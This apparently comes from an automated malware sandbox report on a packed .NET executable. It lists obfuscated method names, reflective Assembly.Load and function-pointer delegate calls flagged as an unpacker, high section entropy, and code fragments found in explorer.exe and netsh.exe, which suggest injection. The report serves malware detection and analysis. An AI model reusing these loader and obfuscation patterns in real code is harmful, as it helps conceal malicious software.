                Source: 0.2.hOe2JrpIAE.exe.7140000.12.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                Source: 0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpack, OV.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpack, OV.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                .NET source code contains potential unpacker
                Source: hOe2JrpIAE.exe, Main_Panel.cs.Net Code: InitializeComponent
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, XfJx19P9NihkSJyVVW.cs.Net Code: UJfBj2UJXq System.Reflection.Assembly.Load(byte[])
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, XfJx19P9NihkSJyVVW.cs.Net Code: UJfBj2UJXq System.Reflection.Assembly.Load(byte[])
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, XfJx19P9NihkSJyVVW.cs.Net Code: UJfBj2UJXq System.Reflection.Assembly.Load(byte[])
                Source: 7.2.explorer.exe.1093f840.0.raw.unpack, Main_Panel.cs.Net Code: InitializeComponent
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_055BB678 pushad ; ret 0_2_055BB679
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_07253262 push es; iretd 0_2_07253265
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_07292B5F pushfd ; ret 0_2_07292B60
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_07292C15 pushfd ; ret 0_2_07292C17
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_072948D2 push 0000007Fh; ret 0_2_072948D4
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041406A push edx; ret 6_2_0041406F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_00417B13 push ebp; iretd 6_2_00417B1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041B387 pushad ; ret 6_2_0041B388
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041D4B5 push eax; ret 6_2_0041D508
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041D56C push eax; ret 6_2_0041D572
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041D502 push eax; ret 6_2_0041D508
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041D50B push eax; ret 6_2_0041D572
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041664B push ds; ret 6_2_00416661
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0111225F pushad ; ret 6_2_011127F9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011127FA pushad ; ret 6_2_011127F9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011409AD push ecx; mov dword ptr [esp], ecx6_2_011409B6
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0111283D push eax; iretd 6_2_01112858
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4DDB02 push esp; retn 0000h7_2_0E4DDB03
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4DDB1E push esp; retn 0000h7_2_0E4DDB1F
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4DD9B5 push esp; retn 0000h7_2_0E4DDAE7
                Source: C:\Windows\explorer.exeCode function: 7_2_1061A9B5 push esp; retn 0000h7_2_1061AAE7
                Source: C:\Windows\explorer.exeCode function: 7_2_1061AB02 push esp; retn 0000h7_2_1061AB03
                Source: C:\Windows\explorer.exeCode function: 7_2_1061AB1E push esp; retn 0000h7_2_1061AB1F
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_01089C4D push ecx; ret 8_2_01089C60
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03C9225F pushad ; ret 8_2_03C927F9
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03C927FA pushad ; ret 8_2_03C927F9
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CC09AD push ecx; mov dword ptr [esp], ecx8_2_03CC09B6
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03C9283D push eax; iretd 8_2_03C92858
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030CB387 pushad ; ret 8_2_030CB388
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030C406A push edx; ret 8_2_030C406F
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030C664B push ds; ret 8_2_030C6661
                Source: hOe2JrpIAE.exeStatic PE information: section name: .text entropy: 7.965298829702422
                Source: 0.2.hOe2JrpIAE.exe.7140000.12.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                Source: 0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpack, OV.csHigh entropy of concatenated method names: 'eX9', 'RgtTUJcyZL', 'XXu', 'IXK', 'qX0', 'zXZ', 'Uvdq5j', 'yw', 'Os', 'Bx'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, gSYEfxJ3mWb53dtiApw.csHigh entropy of concatenated method names: 'Yi3HoWc5L7', 'r4XHUHDJSP', 'OCjHjmxt6E', 'jTRkjZWzA6RG2Z8YBNX', 'FNltarn0koU4d8iyLEu', 'VBlBq1n1PBx2faSGeLU'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, uWJe8fBUSmndOswZA9.csHigh entropy of concatenated method names: 'IglJlLW4CR', 'nqLJPFnTWA', 'fyuJhiRNre', 'lCvJwe7qUP', 'wU0JAMmgsd', 'K3QJfKGuj3', 'KoCcECBZbTQFG09ROB', 'ggS0MwriqKgLuSaCQX', 'b5MJJAU2rL', 'Lq0Jy14gi8'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, GpOKynzXxAx0mhsKjJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lo4iYF5Gr6', 'CyXiAMdekV', 'fMviftxHZH', 'OTZib6UQSO', 'lqUiaU7jBL', 'ofJiiQlIXy', 'PV4iHIwKKn'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, jKBZbCDWTWf77lE54J.csHigh entropy of concatenated method names: 'YWmY6nvWtR', 'yvGYsZ5XYn', 'XbRYglkFsZ', 'gR9YI75Rpc', 'XEdYTXyBum', 'wwMYKJU4bN', 'Vb2Y8GJ88Y', 'TQjYdbA5pg', 'Y6eYGFKX45', 'phmYXEKLgq'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, w6kQefL8m0YoHQx3Me.csHigh entropy of concatenated method names: 'ToString', 'cU2fXCgBu3', 'QJlfIcgSyk', 'mnyfC2D76n', 'EjEfT3p2Q7', 'MfofKGos0v', 'lPhfnVUx35', 'pQpf8Kjduc', 'dfyfd7iX9L', 'Ll4f55UNYM'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, fqUPcmS4qlWLbVU0Mm.csHigh entropy of concatenated method names: 'cDE0F3qC3P', 'NL40ZtDNKF', 'RKfMC2O34L', 'vtAMT36ij8', 'tyAMKkLlJj', 'rsTMn4WvFc', 'xmBM8SZlu2', 'ENDMdod0eJ', 'XAXM5pY8ff', 'p0HMGsDObd'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, tUoopq5N8vkUC0wdsi.csHigh entropy of concatenated method names: 'nPAloudTWJ', 'kNtlUvUHB0', 'LTcljXJTtb', 'moMlx4h0U0', 'PqulFH69XZ', 'ylTlqrkmGA', 'pDTlZsJPSw', 'CCil6PBqqT', 'iMYlskPYU2', 'IQ1lSGm1Rd'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, mP2gWpWeNb4y9k4ghF.csHigh entropy of concatenated method names: 'Lqcb4Weao1', 't7Rb1nA39L', 'FQPaOmtoRD', 'z6uaJygZYm', 'e52bXdmmLy', 'JMMbRaUDkF', 'ygdbDxgZPJ', 'rWrbmHfpUt', 'Ealbu5si5R', 'umqbLrMxcK'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, Jjt1fo1sfRiO1974xp.csHigh entropy of concatenated method names: 'keAiJin9yY', 'OOuiy4B4nv', 'vnQiBYrNCv', 'Hj8i7CNVn5', 'OjoiQajaQc', 'fNTi0b2ZCW', 'gcJieMYmt5', 'ausatg3rjJ', 'e0Wa4FmkHL', 'iMja2cZDsh'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, T7ThVMJytj6r8Jm6bx6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gCbHmo6YXb', 'o8ZHucpJvn', 'TgfHLoEYvk', 'KdyH93xOqQ', 'tvhHNFbBfZ', 'WRiHWMdHy8', 'IdrHt9sO0X'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, RRfZn892i9PnkChBY8.csHigh entropy of concatenated method names: 'nembhc0aKy', 'vIAbwclyve', 'ToString', 'jQSb7T7jdD', 'bSbbQEl9FS', 'LxabMOHm3g', 'egnb0m7uF8', 'vqrbeDGfuF', 'yBrblpnjTE', 'FE1bPRtDih'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, pHJXoU8MHljljU27Z9.csHigh entropy of concatenated method names: 'jbRl7yHeS0', 'k2glMA81bF', 'dd3levqyjQ', 'bCFe1wPfbx', 'SSgezYlK52', 'SQnlOg5fjI', 'cHelJ5Gb1G', 'wxQl3wO8fU', 'h1Wly8dMPh', 'on5lBvfR8W'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, fG424W48tRQhx3CopQ.csHigh entropy of concatenated method names: 'XuUa7bTd4o', 'QFfaQMuHb5', 'j4CaMXJ7NJ', 'Wcua0b1dPT', 'bV2aeWuwOO', 'KOLalDGogP', 'cvUaPa9wG0', 'VlRav2mFv4', 'Y8tah1hhon', 'iwMawX0yUI'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, TRDyijQaiyiZRTkxOq.csHigh entropy of concatenated method names: 'Dispose', 'TkXJ2q4hop', 'Dnh3IGPHGX', 'TI4QQOteaK', 'p7GJ1424W8', 'WRQJzhx3Co', 'ProcessDialogKey', 'tQw3Ox1Pfh', 'YWu3J3GVp1', 'kSa33njt1f'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, Gsdn3QgKGuj3ABI1L9.csHigh entropy of concatenated method names: 'DdPecURHqM', 'BsDeQkeXBS', 'EB3e0X8Q5X', 'jlqel3WmDx', 'ziXePyu7m4', 'TkM0N5vpQC', 'uGe0WgM04k', 'y0y0tgJJNM', 'AOk04Bolp2', 'KrE02Trj8H'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, XfJx19P9NihkSJyVVW.csHigh entropy of concatenated method names: 'sXNycHJeF9', 'Tpdy7deA27', 'RLsyQ0M60C', 'RE0yMOdeDG', 'DE6y01QY5O', 'RpPyeEBPuI', 'fknyl4wsUS', 'E01yPoo7ag', 'xZIyvOmdra', 'w0tyhPv7y8'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, Qri0x7syuiRNrevCve.csHigh entropy of concatenated method names: 'J2aMxA0UM1', 'B6yMqDFdni', 'tpDM6tDVFl', 'mPSMshdccI', 'O34MAEKjqo', 'pQlMfKV6d4', 'AeHMborSHI', 'QrBMa4nAIt', 'dsbMi07RYD', 'xwLMHakJkF'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, tvOcrl3eIFMEK0gRcO.csHigh entropy of concatenated method names: 'abDj7cM5m', 'QdRxgAyi3', 'iLcqIiUb0', 'RTiZrfX2K', 'Qr6sxfsTp', 'cEoSXov0g', 'v8LZH9gJx5Gh7UvxH2', 'fxsGkOEmfZHALJnd6I', 'pXqNLXqPx37goTvdSS', 'JTPaPMS0i'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, rsRPv9JO8iJZ0C7ddKS.csHigh entropy of concatenated method names: 'aH3iogLVuU', 'HgjiUF1F2A', 'LuqijFmNcF', 'G6mixOE7A8', 'AeWiFvfy80', 'S8piqOQUeA', 'of2iZGnsqX', 'lkei6TIX6N', 'L1QisGbI1H', 'dGriSa8to2'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, vHjLiUmOYvJOUgmPGm.csHigh entropy of concatenated method names: 'GTnAGAiMDn', 'UmAARElWjW', 'm4NAm78BOR', 'rSUAuxnVQQ', 'XPLAIs8dFR', 'tb8ACN10DV', 'T7FATXVx5U', 'oGUAKObAGc', 'hixAn2YyXP', 'wyLA8C05xJ'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, jLW4CR6YqLFnTWAfMo.csHigh entropy of concatenated method names: 'rwqQmtdjy9', 'PUiQu6Ub38', 'sfdQLvdlAZ', 'VI7Q96X73F', 'kqMQNE0nGR', 'wOnQWByQFZ', 'L0gQtC2B6n', 'BkAQ4aW7D7', 'TqHQ2flayW', 'l0nQ1YQ7wv'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, nx1Pfh21Wu3GVp1PSa.csHigh entropy of concatenated method names: 'OiWagDlWZd', 'DD8aIfaMm5', 'wHFaCyPw2v', 'wUnaTk55yD', 'tTjamCRrNc', 'UDnaKlsyO6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpack, OV.csHigh entropy of concatenated method names: 'eX9', 'RgtTUJcyZL', 'XXu', 'IXK', 'qX0', 'zXZ', 'Uvdq5j', 'yw', 'Os', 'Bx'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, gSYEfxJ3mWb53dtiApw.csHigh entropy of concatenated method names: 'Yi3HoWc5L7', 'r4XHUHDJSP', 'OCjHjmxt6E', 'jTRkjZWzA6RG2Z8YBNX', 'FNltarn0koU4d8iyLEu', 'VBlBq1n1PBx2faSGeLU'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, uWJe8fBUSmndOswZA9.csHigh entropy of concatenated method names: 'IglJlLW4CR', 'nqLJPFnTWA', 'fyuJhiRNre', 'lCvJwe7qUP', 'wU0JAMmgsd', 'K3QJfKGuj3', 'KoCcECBZbTQFG09ROB', 'ggS0MwriqKgLuSaCQX', 'b5MJJAU2rL', 'Lq0Jy14gi8'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, GpOKynzXxAx0mhsKjJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lo4iYF5Gr6', 'CyXiAMdekV', 'fMviftxHZH', 'OTZib6UQSO', 'lqUiaU7jBL', 'ofJiiQlIXy', 'PV4iHIwKKn'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, jKBZbCDWTWf77lE54J.csHigh entropy of concatenated method names: 'YWmY6nvWtR', 'yvGYsZ5XYn', 'XbRYglkFsZ', 'gR9YI75Rpc', 'XEdYTXyBum', 'wwMYKJU4bN', 'Vb2Y8GJ88Y', 'TQjYdbA5pg', 'Y6eYGFKX45', 'phmYXEKLgq'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, w6kQefL8m0YoHQx3Me.csHigh entropy of concatenated method names: 'ToString', 'cU2fXCgBu3', 'QJlfIcgSyk', 'mnyfC2D76n', 'EjEfT3p2Q7', 'MfofKGos0v', 'lPhfnVUx35', 'pQpf8Kjduc', 'dfyfd7iX9L', 'Ll4f55UNYM'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, fqUPcmS4qlWLbVU0Mm.csHigh entropy of concatenated method names: 'cDE0F3qC3P', 'NL40ZtDNKF', 'RKfMC2O34L', 'vtAMT36ij8', 'tyAMKkLlJj', 'rsTMn4WvFc', 'xmBM8SZlu2', 'ENDMdod0eJ', 'XAXM5pY8ff', 'p0HMGsDObd'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, tUoopq5N8vkUC0wdsi.csHigh entropy of concatenated method names: 'nPAloudTWJ', 'kNtlUvUHB0', 'LTcljXJTtb', 'moMlx4h0U0', 'PqulFH69XZ', 'ylTlqrkmGA', 'pDTlZsJPSw', 'CCil6PBqqT', 'iMYlskPYU2', 'IQ1lSGm1Rd'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, mP2gWpWeNb4y9k4ghF.csHigh entropy of concatenated method names: 'Lqcb4Weao1', 't7Rb1nA39L', 'FQPaOmtoRD', 'z6uaJygZYm', 'e52bXdmmLy', 'JMMbRaUDkF', 'ygdbDxgZPJ', 'rWrbmHfpUt', 'Ealbu5si5R', 'umqbLrMxcK'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, Jjt1fo1sfRiO1974xp.csHigh entropy of concatenated method names: 'keAiJin9yY', 'OOuiy4B4nv', 'vnQiBYrNCv', 'Hj8i7CNVn5', 'OjoiQajaQc', 'fNTi0b2ZCW', 'gcJieMYmt5', 'ausatg3rjJ', 'e0Wa4FmkHL', 'iMja2cZDsh'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, T7ThVMJytj6r8Jm6bx6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gCbHmo6YXb', 'o8ZHucpJvn', 'TgfHLoEYvk', 'KdyH93xOqQ', 'tvhHNFbBfZ', 'WRiHWMdHy8', 'IdrHt9sO0X'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, RRfZn892i9PnkChBY8.csHigh entropy of concatenated method names: 'nembhc0aKy', 'vIAbwclyve', 'ToString', 'jQSb7T7jdD', 'bSbbQEl9FS', 'LxabMOHm3g', 'egnb0m7uF8', 'vqrbeDGfuF', 'yBrblpnjTE', 'FE1bPRtDih'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, pHJXoU8MHljljU27Z9.csHigh entropy of concatenated method names: 'jbRl7yHeS0', 'k2glMA81bF', 'dd3levqyjQ', 'bCFe1wPfbx', 'SSgezYlK52', 'SQnlOg5fjI', 'cHelJ5Gb1G', 'wxQl3wO8fU', 'h1Wly8dMPh', 'on5lBvfR8W'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, fG424W48tRQhx3CopQ.csHigh entropy of concatenated method names: 'XuUa7bTd4o', 'QFfaQMuHb5', 'j4CaMXJ7NJ', 'Wcua0b1dPT', 'bV2aeWuwOO', 'KOLalDGogP', 'cvUaPa9wG0', 'VlRav2mFv4', 'Y8tah1hhon', 'iwMawX0yUI'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, TRDyijQaiyiZRTkxOq.csHigh entropy of concatenated method names: 'Dispose', 'TkXJ2q4hop', 'Dnh3IGPHGX', 'TI4QQOteaK', 'p7GJ1424W8', 'WRQJzhx3Co', 'ProcessDialogKey', 'tQw3Ox1Pfh', 'YWu3J3GVp1', 'kSa33njt1f'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, Gsdn3QgKGuj3ABI1L9.csHigh entropy of concatenated method names: 'DdPecURHqM', 'BsDeQkeXBS', 'EB3e0X8Q5X', 'jlqel3WmDx', 'ziXePyu7m4', 'TkM0N5vpQC', 'uGe0WgM04k', 'y0y0tgJJNM', 'AOk04Bolp2', 'KrE02Trj8H'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, XfJx19P9NihkSJyVVW.csHigh entropy of concatenated method names: 'sXNycHJeF9', 'Tpdy7deA27', 'RLsyQ0M60C', 'RE0yMOdeDG', 'DE6y01QY5O', 'RpPyeEBPuI', 'fknyl4wsUS', 'E01yPoo7ag', 'xZIyvOmdra', 'w0tyhPv7y8'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, Qri0x7syuiRNrevCve.csHigh entropy of concatenated method names: 'J2aMxA0UM1', 'B6yMqDFdni', 'tpDM6tDVFl', 'mPSMshdccI', 'O34MAEKjqo', 'pQlMfKV6d4', 'AeHMborSHI', 'QrBMa4nAIt', 'dsbMi07RYD', 'xwLMHakJkF'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, tvOcrl3eIFMEK0gRcO.csHigh entropy of concatenated method names: 'abDj7cM5m', 'QdRxgAyi3', 'iLcqIiUb0', 'RTiZrfX2K', 'Qr6sxfsTp', 'cEoSXov0g', 'v8LZH9gJx5Gh7UvxH2', 'fxsGkOEmfZHALJnd6I', 'pXqNLXqPx37goTvdSS', 'JTPaPMS0i'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, rsRPv9JO8iJZ0C7ddKS.csHigh entropy of concatenated method names: 'aH3iogLVuU', 'HgjiUF1F2A', 'LuqijFmNcF', 'G6mixOE7A8', 'AeWiFvfy80', 'S8piqOQUeA', 'of2iZGnsqX', 'lkei6TIX6N', 'L1QisGbI1H', 'dGriSa8to2'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, vHjLiUmOYvJOUgmPGm.csHigh entropy of concatenated method names: 'GTnAGAiMDn', 'UmAARElWjW', 'm4NAm78BOR', 'rSUAuxnVQQ', 'XPLAIs8dFR', 'tb8ACN10DV', 'T7FATXVx5U', 'oGUAKObAGc', 'hixAn2YyXP', 'wyLA8C05xJ'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, jLW4CR6YqLFnTWAfMo.csHigh entropy of concatenated method names: 'rwqQmtdjy9', 'PUiQu6Ub38', 'sfdQLvdlAZ', 'VI7Q96X73F', 'kqMQNE0nGR', 'wOnQWByQFZ', 'L0gQtC2B6n', 'BkAQ4aW7D7', 'TqHQ2flayW', 'l0nQ1YQ7wv'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, nx1Pfh21Wu3GVp1PSa.csHigh entropy of concatenated method names: 'OiWagDlWZd', 'DD8aIfaMm5', 'wHFaCyPw2v', 'wUnaTk55yD', 'tTjamCRrNc', 'UDnaKlsyO6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, gSYEfxJ3mWb53dtiApw.csHigh entropy of concatenated method names: 'Yi3HoWc5L7', 'r4XHUHDJSP', 'OCjHjmxt6E', 'jTRkjZWzA6RG2Z8YBNX', 'FNltarn0koU4d8iyLEu', 'VBlBq1n1PBx2faSGeLU'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, uWJe8fBUSmndOswZA9.csHigh entropy of concatenated method names: 'IglJlLW4CR', 'nqLJPFnTWA', 'fyuJhiRNre', 'lCvJwe7qUP', 'wU0JAMmgsd', 'K3QJfKGuj3', 'KoCcECBZbTQFG09ROB', 'ggS0MwriqKgLuSaCQX', 'b5MJJAU2rL', 'Lq0Jy14gi8'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, GpOKynzXxAx0mhsKjJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lo4iYF5Gr6', 'CyXiAMdekV', 'fMviftxHZH', 'OTZib6UQSO', 'lqUiaU7jBL', 'ofJiiQlIXy', 'PV4iHIwKKn'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, jKBZbCDWTWf77lE54J.csHigh entropy of concatenated method names: 'YWmY6nvWtR', 'yvGYsZ5XYn', 'XbRYglkFsZ', 'gR9YI75Rpc', 'XEdYTXyBum', 'wwMYKJU4bN', 'Vb2Y8GJ88Y', 'TQjYdbA5pg', 'Y6eYGFKX45', 'phmYXEKLgq'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, w6kQefL8m0YoHQx3Me.csHigh entropy of concatenated method names: 'ToString', 'cU2fXCgBu3', 'QJlfIcgSyk', 'mnyfC2D76n', 'EjEfT3p2Q7', 'MfofKGos0v', 'lPhfnVUx35', 'pQpf8Kjduc', 'dfyfd7iX9L', 'Ll4f55UNYM'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, fqUPcmS4qlWLbVU0Mm.csHigh entropy of concatenated method names: 'cDE0F3qC3P', 'NL40ZtDNKF', 'RKfMC2O34L', 'vtAMT36ij8', 'tyAMKkLlJj', 'rsTMn4WvFc', 'xmBM8SZlu2', 'ENDMdod0eJ', 'XAXM5pY8ff', 'p0HMGsDObd'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, tUoopq5N8vkUC0wdsi.csHigh entropy of concatenated method names: 'nPAloudTWJ', 'kNtlUvUHB0', 'LTcljXJTtb', 'moMlx4h0U0', 'PqulFH69XZ', 'ylTlqrkmGA', 'pDTlZsJPSw', 'CCil6PBqqT', 'iMYlskPYU2', 'IQ1lSGm1Rd'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, mP2gWpWeNb4y9k4ghF.csHigh entropy of concatenated method names: 'Lqcb4Weao1', 't7Rb1nA39L', 'FQPaOmtoRD', 'z6uaJygZYm', 'e52bXdmmLy', 'JMMbRaUDkF', 'ygdbDxgZPJ', 'rWrbmHfpUt', 'Ealbu5si5R', 'umqbLrMxcK'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, Jjt1fo1sfRiO1974xp.csHigh entropy of concatenated method names: 'keAiJin9yY', 'OOuiy4B4nv', 'vnQiBYrNCv', 'Hj8i7CNVn5', 'OjoiQajaQc', 'fNTi0b2ZCW', 'gcJieMYmt5', 'ausatg3rjJ', 'e0Wa4FmkHL', 'iMja2cZDsh'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, T7ThVMJytj6r8Jm6bx6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gCbHmo6YXb', 'o8ZHucpJvn', 'TgfHLoEYvk', 'KdyH93xOqQ', 'tvhHNFbBfZ', 'WRiHWMdHy8', 'IdrHt9sO0X'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, RRfZn892i9PnkChBY8.csHigh entropy of concatenated method names: 'nembhc0aKy', 'vIAbwclyve', 'ToString', 'jQSb7T7jdD', 'bSbbQEl9FS', 'LxabMOHm3g', 'egnb0m7uF8', 'vqrbeDGfuF', 'yBrblpnjTE', 'FE1bPRtDih'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, pHJXoU8MHljljU27Z9.csHigh entropy of concatenated method names: 'jbRl7yHeS0', 'k2glMA81bF', 'dd3levqyjQ', 'bCFe1wPfbx', 'SSgezYlK52', 'SQnlOg5fjI', 'cHelJ5Gb1G', 'wxQl3wO8fU', 'h1Wly8dMPh', 'on5lBvfR8W'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, fG424W48tRQhx3CopQ.csHigh entropy of concatenated method names: 'XuUa7bTd4o', 'QFfaQMuHb5', 'j4CaMXJ7NJ', 'Wcua0b1dPT', 'bV2aeWuwOO', 'KOLalDGogP', 'cvUaPa9wG0', 'VlRav2mFv4', 'Y8tah1hhon', 'iwMawX0yUI'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, TRDyijQaiyiZRTkxOq.csHigh entropy of concatenated method names: 'Dispose', 'TkXJ2q4hop', 'Dnh3IGPHGX', 'TI4QQOteaK', 'p7GJ1424W8', 'WRQJzhx3Co', 'ProcessDialogKey', 'tQw3Ox1Pfh', 'YWu3J3GVp1', 'kSa33njt1f'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, Gsdn3QgKGuj3ABI1L9.csHigh entropy of concatenated method names: 'DdPecURHqM', 'BsDeQkeXBS', 'EB3e0X8Q5X', 'jlqel3WmDx', 'ziXePyu7m4', 'TkM0N5vpQC', 'uGe0WgM04k', 'y0y0tgJJNM', 'AOk04Bolp2', 'KrE02Trj8H'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, XfJx19P9NihkSJyVVW.csHigh entropy of concatenated method names: 'sXNycHJeF9', 'Tpdy7deA27', 'RLsyQ0M60C', 'RE0yMOdeDG', 'DE6y01QY5O', 'RpPyeEBPuI', 'fknyl4wsUS', 'E01yPoo7ag', 'xZIyvOmdra', 'w0tyhPv7y8'
